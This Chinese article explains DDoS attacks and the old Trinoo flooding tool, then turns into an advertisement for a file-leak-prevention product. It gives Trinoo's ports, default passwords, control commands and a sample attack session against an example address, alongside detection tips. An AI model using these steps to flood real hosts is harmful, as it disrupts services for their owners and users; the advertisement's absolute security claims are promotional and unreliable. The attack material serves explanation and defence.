进入2000年以来,网络遭受攻击事件不断发生,全球许多著名网站如yahoo、cnn、buy、ebay、fbi,包括中国的新浪网相继遭到不名身份的黑客攻击,值得注意的是,在这些攻击行为中,黑客摈弃了以往常常采用的更改主页这一对网站实际破坏性有限的做法,取而代之的是,在一定时间内,彻底使被攻击的网络丧失正常服务功能,这种攻击手法为 DDoS,即分布式拒绝服务攻击(Distributed denial of service )。
简单的讲,拒绝服务就是用超出被攻击目标处理能力的海量数据包消耗可用系统,带宽资源,致使网络服务瘫痪的一种攻击手段。在早期, 拒绝服务攻击主要是针对处理能力比较弱的单机,如个人pc,或是窄带宽连接的网站,对拥有高带宽连接,高性能设备的网站影响不大,但在99年底,伴随着DDoS的出现,这种高端网站高枕无忧的局面不复存在,与早期的DoS攻击由单台攻击主机发起,单兵作战相较,DDoS实现是借助数百,甚至数千台被植入攻击守护进程的攻击主机同时发起的集团作战行为,在这种几百,几千对一的较量中, 网络服务提供商所面对的破坏力是空前巨大的。
拒绝服务攻击自问世以来,衍生了多种形式,现将两种使用较频繁的TCP-SYN flood, UDP flood做一个介绍 。TCP-SYN flood又称半开式连接攻击,每当我们进行一次标准的TCP连接(如WWW浏览,下载文件等)会有一个一个三次握手的过程,首先是请求方向服务方发送一个SYN消息,服务方收到SYN后,会向请求方回送一个SYN-ACK表示确认,当请求方收到SYN-ACK后则再次向服务方发送一个ACK消息,一次成功的TCP连接由此就建立,可以进行后续工作了,如图所示:
而TCP-SYN flood在它的实现过程中只有前两个步骤,当服务方收到请求方的SYN并回送SYN-ACK确认消息后, 请求方由于采用源地址欺骗等手段,致使服务方得不到ACK回应,这样,服务方会在一定时间处于等待接收请求方ACK消息的状态,一台服务器可用的TCP连接是有限的,如果恶意攻击方快速连续的发送此类连接请求,则服务器可用TCP连接队列很快将会阻塞,系统可用资源,网络可用带宽急剧下降,无法向用户提供正常的网络服务。
Udp在网络中的应用也是比较广泛的,比如DNS解析、realaudio实时音乐、网络管理、联网游戏等,基于udp的攻击种类也是比较多的,如目前在互连网上提供www、mail等服务的设备一般为使用unix操作系统的服务器,他们默认是开放一些有被恶意利用可能的udp服务的,如:echo,chargen. echo服务回显接收到的每一个数据包,而原本作为测试功能的chargen服务会在收到每一个数据包时随机反馈一些字符,如果恶意攻击者将这两个udp服务互指,则网络可用带宽会很快耗尽。
自99年后半年开始,DDoS攻击不断在Internet出现,并在应用的过程中不断的得到完善,在Unix或nt环境上截至目前已有一系列比较成熟的软件产品,如Trinoo,TFN,TFN2K,STACHELDRATH等,他们基本核心及攻击思路是很相象的,下面就通过Trinoo对这类软件做一介绍。
Trinoo是基于UDP flood的攻击软件,它向被攻击目标主机随机端口发送全零的4字节UDP包,被攻击主机的网络性能在处理这些超出其处理能力垃圾数据包的过程中不断下降,直至不能提供正常服务甚至崩溃。
Trinoo攻击功能的实现,是通过三个模块付诸实施的,
1:攻击守护进程(NS) 2:攻击控制进程(MASTER) 3:客户端(NETCAT,标准TELNET程序等),
攻击守护进程NS是真正实施攻击的程序,它一般和攻击控制进程(MASTER)所在主机分离,在原始C文件ns.c编译的时候,需要加入可控制其执行的攻击控制进程MASTER所在主机IP,(只有在ns.c中的IP方可发起ns的攻击行为)编译成功后,黑客通过目前比较成熟的主机系统漏洞破解(如rpc.cmsd,rpc.ttdbserver,rpc.statd)可以方便的将大量NS植入因特网中有上述漏洞主机内。ns运行时,会首先向攻击控制进程(MASTER)所在主机的31335端口发送内容为HELLO的UDP包,标示它自身的存在,随后攻击守护进程即处于对端口27444的侦听状态,等待master攻击指令的 到来。
攻击控制进程(MASTER)在收到攻击守护进程的HELLO包后,会在自己所在目录生成一个加密的名为...的可利用主机表文件, MASTER的启动是需要密码的,在正确输入默认密码gOrave后, MASTER即成功启动,它一方面侦听端口31335,等待攻击守护进程的HELLO包,另一方面侦听端口27665,等待客户端对其的连接。当客户端连接成功并发出指令时, MASTER所在主机将向攻击守护进程ns所在主机的27444端口传递指令。
客户端不是trinoo自带的一部分,可用标准的能提供TCP连接的程序,如TELNET,NETCAT等,连接MASTER所在主机的27665端口, 输入默认密码betaalmostdone后,即完成了连接工作,进入攻击控制可操作的提示状态。
目前版本的trinoo有六个可用命令,mtimer:设定攻击时长,如mtimer 60,攻击60秒,如果不设置的话,默认是无限。dos:对某一目标主机实施攻击,如dos 12.34.45.56 mdie:停止正在实施的攻击,使用这一功能需要输入口令killme,mping:请求攻击守护进程NS回应,监测ns是否工作。mdos, 对多个目标主机实施攻击,msize:设置攻击UDP包的大小。 Trinoo运行的总体轮廓可用下图说明:
我们来看一次攻击的实例:
被攻击的目标主机victim IP为:12.23.34.45
ns被植入三台sun的主机里,他们的IP对应关系分别为client1:11.11.11.11
client2:22.22.22.22
client3:33.33.33.33
master所在主机为masterhost:11.22.33.44
首先我们要启动各个进程,在client1,2,3上分别执行ns,启动攻击守护进程,
其次,在master所在主机启动master
masterhost# ./master
?? gOrave (系统示输入密码,输入gOrave后master成功启动)
trinoo v1.07d2+f3+c [Mar 20 2000:14:38:49] (连接成功)
在任意一台与网络连通的可使用telnet的设备上,执行
telnet 11.22.33.44 27665
Escape character is '^]'.
betaalmostdone (输入密码)
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo> (进入提示符)
trinoo> mping (我们首先来监测一下各个攻击守护进程是否成功启动)
mping: Sending a PING to every Bcasts.
trinoo> PONG 1 Received from 11.11.11.11
PONG 2 Received from 22.22.22.22
PONG 3 Received from 33.33.33.33 (成功响应)
trinoo> mtimer 60 (设定攻击时间为60秒)
mtimer: Setting timer on bcast to 60.
trinoo> dos 12.23.34.45
DoS: Packeting 12.23.34.45......
至此一次攻击结束,此时ping 12.23.34.45,会得到icmp不可到达反馈,目标主机此时与网络的正常连接已被破坏。
由于目前版本的trinoo尚未采用IP地址欺骗,因此在被攻击的主机系统日志里我们可以看到如下纪录:
Mar 20 14:40:34 victim snmpXdmid: Will attempt to re-establish connection.
Mar 20 14:40:35 victim snmpdx: error while receiving a pdu from 11.11.11.11.59841: The message has a wrong header type (0x0)
Mar 20 14:40:35 victim snmpdx: error while receiving a pdu from 22.22.22.22.43661: The message has a wrong header type (0x0)
Mar 20 14:40:36 victim snmpdx: error while receiving a pdu from 33.33.33.33.40183: The message has a wrong header type (0x0)
Mar 20 14:40:36 victim snmpXdmid: Error receiving PDU The message has a wrong header type (0x0).
Mar 20 14:40:36 victim snmpXdmid: Error receiving packet from agent; rc = -1.
Mar 20 14:40:36 victim snmpXdmid: Will attempt to re-establish connection.
Mar 20 14:40:36 victim snmpXdmid: Error receiving PDU The message has a wrong header type (0x0).
Mar 20 14:40:36 victim snmpXdmid: Error receiving packet from agent; rc = -1.
由上述日志,我们不难看出发起攻击的ip地址,这一问题,通过ip spoof在后期的软件tfn,tfn2k等软件中得到了解决,给被攻击者找出肇事者进一步增加了难度。
Trinoo等DdoS攻击软件的出现,对网络的安全产生了巨大的挑战,借助这种在网上可以得到的公开软件,任何一个普通的上网者对网络的安全都构成了潜在的威胁,那么能不能做一些预防工作呢?
有一些是可以做的,
首先,检测自己的系统是否被植入了攻击守护程序,最简单的办法,检测上述提到的udp端口,如netstat -a | grep udp 端口号,如果得到listen等激活状态,就要注意了,或者用专门的检测软件,这里推荐美国FBI专门研制的Find Distributed Denial of Service (find_ddos) , 最新版本的可检测到tfn2k client, tfn2k daemon, trinoo daemon, trinoo master, tfn daemon, tfn client, stacheldraht master, stacheldraht client, stachelddraht demon和 tfn-rush client等目前几乎所有流行攻击软件。 它的运行很简单,解开包,运行find_ddos即可。
企业对应外网攻击行为,规范网络行为保护文件访问安全方法:
大势至电脑文件防泄密系统(下载地址:https://dashizhi.com/Download_Center)是一款保护电脑文件安全、严防企业商业机密外泄的软件产品。系统主要从三个维度进行管理,即USB存储设备控制、上网行为控制、操作系统控制,从而构建立体化、全方位信息安全防护平台。大势至电脑文件防泄密系统可以禁止USB存储设备连接电脑拷贝资料,不控制鼠标、键盘、U盾等USB非存储设备,还可以灵活管控光驱、软驱、红外、蓝牙、随身wifi、聊天软件、网盘、邮箱、注册表、应用程序、网卡、随身wifi等多项功能。大势至电脑文件防泄密系统安装和操作十分简单快捷,各项功能划分精细齐全,控制精准有效。系统分为两个版本,即单机版和网络版,单机版逐一管理,网络版有管理端,可以统一管理。
一、产品特点:
NDIS核心层文件过滤驱动 | 全报文 API HOOK技术
大势至电脑文件防泄密系统是大势至软件公司经过多年在企业网络管理、局域网安全防护深耕细作、日积月累的技术结晶。
目前,系统已经成功应用多行业电脑终端,集成了很多功能模块。系统成熟稳定,兼容性好,安全防御机制完善,无需专业的网络管理人员维护,适合各个行业、不同规模的企业使用。
二:特色功能
三:技术优势:
控制原理
系统基于 USB 存储协议在 Windows 系统底层对存储设备进行读写控制,可自动识别 USB 存储设备类型。一旦 USB 存储设备插入到安装客户端的计算机中 , 客户端通过设备标识或者设备的序列号识别 USB 存储设备 ,按照已设定的存储设备控制策略的权限类型对 USB 存储设备进行读写控制,标准的USB存储设备,如U盘 ,移动硬盘等,可以设置成四个权限:禁用、只读、只写、放行,此外,还可以设置只允许 U盘向电脑拷贝文件,禁止电脑向U盘拷贝,或者反向控制。还可以设置只允许特定 USB存储设备使用,或者向USB存储设备复制文件必须输入管理员密码等。
系统对于禁止文件发送,禁止文件上传,其主要原理是利用 API Hooking 技术,在windows系统下,与文件操作相关的几个API,如copyFile、MoveFile等,通过拦截这几个 API,便可以知道用户对文件的操作行为,进而便可以阻止文件向外发送、 拖拽、 拷贝、 移动等行为,从而防止机密资料外泄。
大势至电脑文件防泄密软件是一款专业的数据防泄密软件,可以灵活控制USB存储设备、禁止U盘使用、禁止网盘上传文件、禁止聊天软件发送文件、禁止邮件附件发送文件、禁止FTP文件上传等,防止通过各种途径将电脑文件泄漏出去。
1、大势至电脑文件加密软件的功能
1)泄密途径的全面控制:常见的泄密途径包括U盘拷贝、QQ等聊天工具的剪贴及文件传输、webmail发邮件、打印、截屏工具的使用等。U盘拷贝、QQ传文件及webmail的文件发送在加密软件得到运用后,传输的应该都是密文,如果经过测试(将文件传输到未装加密软件的电脑,显示为密文)后功能正常,则应该重点考察通过剪贴板能否拷贝、通过屏幕拷贝(一种是使用Windows快捷键PrtScr或者ALT+PrtScr,另一种是使用一些可以捕捉屏幕的软件,比如QQ等)显示是否是密文、是否禁止打印等。此外,针对OLE插入、拖拽、文件修改进程名等较少用的泄密方法也要进行测试。如果泄密途径无法得到有效控制,信息安全就无从谈起。
2)文件权限的灵活管理:为了提高文件的安全,大势至电脑文件加密软件同时具有文件的权限管理功能,即在企业内部,各个部门之前的文件可以有选择的进行流通,这样,可以防止机密信息在企业内部之间的扩散。同时还可以独家实现不解密而单独打开加密软件的功能,阅读后自动“返回”到加密文件里面;同时还可以实现对解密文件的二次访问权限控制功能,独家实现只让读取解密文件而禁止复制解密文件、只让修改解密文件而禁止删除解密文件以及只让打开解密文件而禁止另存为、打印或拖拽解密文件的行为,极大地保护了解密后文件的安全。
3)重要文档的自动备份:大势至电脑文件加密软件可以实时、自动备份重要的电脑文件,有效地防止重要文档被人为破坏或恶意删除。
4)电脑文件操作的记录的功能:本系统可以对文件打开、复制、拷入拷出、解密、备份的情况进行记录,并可以形成详细的文件操作访问日志。因为技术不可能解决100%的泄密问题,这样可以做到事后有迹可查,可第一时间作出有效措施,减少损失。
5)文件离线的管理:本系统在员工短期办公或外出出差、出差天数变更时能提供方便、安全的解决方案,发挥加密软件的最大效用。
6)电脑文件外发/解密的管理:本系统对外部门因工作需要将公司内部文档进行外发时,具有安全的外发方案:外发/解密得到授权并保存记录、最好能控制外发文件的阅读次数及有效阅读期以防止二次扩散。
7)企业的特殊需求:大势至研发团队可以根据用户的需要随时定制开发各种电脑文件防泄漏、电脑文件加密功能,最大限度满足用户个性化的电脑文件安全管理需要。
2、大势至电脑文件加密领先优势如下
1)强大的防脱机加密方式,只要文件被加密过,即便转移到其他存储设备上也会依然保持加密状态。
2)如果不希望重要的文件夹被发现,使用本系统的超强深度隐藏功能,即可瞬间隐藏整个文件夹。
3)对于本系统的管理员账户,访问加密文件夹无需输入任何密码,深度隐藏的文件也可以顺利发现。
4)软件本身具备强大的自我保护功能,防止删除、病毒干扰,防破解。
5)军工级别的加密算法,确保文件夹被严格加密,目前技术条件下没有任何办法可以破解。
6)软件设置简单、应用简便,新手也可以在短时间内尽快上手。
7)本加密软件适用于电脑加密文件夹/万能文件加密/移动硬盘加密/U盘深度加密/各类文档设计方案加密。
8)独家实现不解密查看加密文件的功能,并且用户查看后无需再次进行加密,方便了用户的读取和使用,又保护了加密文件的安全。
9)独家实现对解密后的文件访问权限控制功能,可以只让读取解密后的文件而禁止复制内容、只让修改解密后的文件而禁止删除、只让打开解密后的文件而禁止另存为本地磁盘,同时还可以防止拖拽、打印解密文件的行为。
10)独家实现对加密、解密文件的防泄漏功能,可以严防通过U盘、移动硬盘等USB存储设备和通过邮件、网盘、FTP文件上传以及聊天软件发送文件的方式将电脑文件泄漏出去,从而实现了对电脑文件安全的二次防护。
总之,大势至电脑文件加密系统是当前国内首家的专业电脑文件防泄密和电脑文件加密相结合的文件安全管理软件,通过对电脑文件泄密管道和电脑文件高强度、不可逆向的加密技术,使得大势至电脑文件加密系统可以最大限度地保护电脑文件安全,保护单位无形资产和商业机密的安全。
同时,大势至公司研发团队也会密切关注用户的需要,并可以为用户定制开发各种个性化的电脑文件防泄密、电脑文件加密功能,从而可以确保用户可以实现真正有效的电脑文件保护的目的,为单位创造良好的管理收益和经济效益。
在线客服
